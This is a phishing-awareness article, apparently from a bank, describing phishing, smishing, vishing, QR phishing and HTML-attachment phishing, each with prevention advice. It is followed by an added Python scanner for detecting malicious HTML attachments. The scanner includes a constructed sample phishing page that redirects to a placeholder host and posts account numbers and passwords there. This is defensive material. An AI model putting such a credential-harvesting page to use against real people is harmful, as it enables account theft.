With classic phishing, attackers try to lure their victims to a counterfeit website with the help of a faked e-mail and get them to enter their log-in information (for instance account number, password) there.
Alternatively or additionally, they may also add mail attachments containing a Trojan. Once this attachment is opened, it installs itself in the background, proceeding to capture Internet users’ access details or directing them to fake websites.
Important to know: Financial institutions would never send out e-mails like that!
Prevention: Never click any links or attachments in e-mails, but always enter the financial institution’s address into your browser manually, and check the SSL connection and certificate.
Spear phishing and dynamite phishing
In contrast to classic phishing, which involves large numbers of e-mails sent randomly to the general public, spear phishing targets specifically chosen recipients, who receive e-mails personally tailored to them.
Here the senders take on the guise of a trustworthy person, often posing as an acquaintance, employee or business partner of the recipient. The personalised e-mail contents seem credible and authentic and are therefore at times not even recognised by spam filters.
If such personalised e-mails are created automatically and sent out en masse, we also call this “dynamite phishing”.
Prevention: Remain wary of unexpected e-mails or those with unusual contents, even if you think you know the sender. In case of doubt, contact the sender via a second channel, for instance by telephone.
Smishing (SMS phishing)
SMS messages are increasingly used for phishing attacks, too. The perfidious thing about “smishing” is that most of the criteria suitable for recognising phishing e-mails cannot be applied to SMS messages: There is usually no personal form of address. The language and design of these text messages are too simple and brief to allow any conclusions as to whether they are fake. And on most mobile devices, it is rather difficult or unreliable to check the true sender and the link. Many users are also used to receiving SMS messages to verify their e-banking log-in or before financial transactions are carried out.
Prevention: Never click on any links included in SMS messages, but manually enter the website address of your financial institution which you are familiar with into your browser. Then check there is a secure connection (lock symbol, target address). If you receive any unexpected SMS messages, contact your bank via the contact information you know (for instance their official telephone number) and have them confirm that they actually sent this SMS.
Vishing (voice phishing or phone phishing)
Vishing is the voice- or telephone-based version of phishing. Similar to classic phishing, a well thought-out story is employed to induce users to disclose confidential information, such as their log-in details for their e-banking facility.
Prevention: Never let other people know any of your confidential data, such as passwords. Immediately terminate any phone calls asking you for such details. Contact your financial institution only via their official telephone numbers.
QR phishing
With QR phishing, attackers simply stick their own QR codes (Quick Response codes) over those displayed in frequently visited places and direct unsuspecting users to a fake URL. This way, it is easily possible to execute scripts or show a faked financial institution log-in page, in particular on mobile devices.
Prevention: Never use a QR code to log into a financial institution’s site. Before scanning a QR code, check that it has not been covered up by a fake one, and check whether the link points to the address you expect.
Phishing using websites in the attachment
With phishing using websites in the attachment, no link or document is included in the e-mail you receive – instead, there is simply an HTM or HTML file containing a fake website in the attachment. Victims are fooled, since there is no link to click on. And at first glance, the attached file doesn’t seem that dangerous either, as it isn’t an actual document (Word, Excel) which could, for instance, run macros.
But caution! HTM and HTML files can redirect victims straight to the attacker’s server! Any log-in information then entered will end up in the wrong hands this way. In addition, such files can also contain scripts, which may just cause more damage.
Such redirects and scripts are blocked by current e-mail software for security reasons. If, however, you open such an HTM or HTML attachment, it is no longer controlled by the mail program’s security settings. This is especially perfidious: even users who are generally aware of phishing are duped, because the browser address line “only” shows a local file path and not a dubious URL the way it would with classic phishing.
Prevention: Please be wary of any HTM or HTML attachments in general. Don’t click on any e-mail attachments, but always enter your financial institution’s address into your browser manually.
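As an added illustration of the defender's side (example code, not from the original article), the following scanner looks inside an HTML attachment for exactly the indicators described above: a meta-refresh or script redirect to another server, and a log-in form that posts a password field to an external host. The sample attachment and the hostname `login-example.invalid` are constructed placeholders.

```python
import re
from html.parser import HTMLParser

# Constructed sample attachment of the kind the text describes (placeholder host).
SAMPLE_ATTACHMENT = """<html><head>
<meta http-equiv="refresh" content="0; url=https://login-example.invalid/auth">
<script>window.location = "https://login-example.invalid/auth";</script>
</head><body>
<form action="https://login-example.invalid/collect" method="post">
  Account number <input name="acct"> Password <input name="pw" type="password">
</form></body></html>"""

class AttachmentScanner(HTMLParser):
    """Collects indicators that an HTML attachment forwards the user or their input elsewhere."""
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "form" and a.get("action", "").lower().startswith(("http:", "https:")):
            self.findings.append(("external-form-post", a["action"]))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-field", a.get("name", "")))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies reach handle_data; look for a client-side redirect.
        if self._in_script and re.search(r"(window|document)\.location|location\.(href|replace)", data):
            self.findings.append(("script-redirect", data.strip()[:60]))

def scan_html_attachment(html: str) -> list:
    """Return a list of (indicator, detail) tuples found in the attachment body."""
    p = AttachmentScanner()
    p.feed(html)
    return p.findings

def is_suspicious(html: str) -> bool:
    """Flag the attachment if it redirects, or submits a password to another host."""
    kinds = {k for k, _ in scan_html_attachment(html)}
    harvest = "external-form-post" in kinds and "password-field" in kinds
    return bool(kinds & {"meta-refresh", "script-redirect"}) or harvest
```

Run on a real attachment body, the findings list names each indicator, which a mail gateway or analyst can use to quarantine the message or warn the user.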